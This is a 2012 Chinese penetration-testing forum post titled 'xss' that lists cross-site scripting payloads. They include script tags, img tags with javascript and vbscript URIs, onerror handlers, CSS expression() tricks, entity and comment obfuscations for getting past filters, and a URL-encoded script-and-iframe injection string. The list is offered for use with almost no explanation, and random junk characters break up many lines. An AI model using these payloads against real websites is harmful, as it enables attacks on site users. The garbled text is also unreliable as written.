中国网络渗透测试联盟

标题: xss [打印本页]
作者: admin    时间: 2012-9-15 14:09
标题: xss
<script>alert("跨站")</script>    (最常用)
$ V# a3 ?' n; p' ^<img scr=javascript:alert("跨站")></img>
% v, r6 d& w0 D<img scr="javascrip&#116&#58 alert(/跨站/)></img>
8 i+ E. n, @9 v3 y3 d<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
/ x0 d$ b- B# d5 ~" y2 ?% T" E<img scr="#" onerror=alert(/跨站/)></img>; R3 U6 i: G% z, K; p. K# a
<img scr="#" style="xss:expression(alert(/xss/));"></img>
  c  P! }( S  c6 j<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)) r9 Q, e) N! ^6 Y
<img src=vbscript:msgbox ("xss")></img>
$ ?: k/ j! R: p/ B9 p1 o# c( P<style> input {left:expression (alert('xss'))}</style>' X- R% Z2 J8 |' z6 |2 \$ B; f
<div style={left:expression (alert('xss'))}></div>% l# [; w, L, U: X4 `
<div style={left:exp/* */ression (alert('xss'))}></div>
! \9 C9 `9 K; s9 z) A8 m+ u<div style={left:\0065\0078ression (alert('xss'))}></div>- j# F2 A2 }% `( J( v
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>( [3 b& C7 ]* q% {) p
unicode <div style="{left:expRessioN (alert('xss'))}">
) R  J5 w2 s& j1 i1 N" i" C2 ~
  q* p, ]6 Q( ~, k8 V, L9 Z& W"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
; ]# M, ?& f# j9 }; F



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2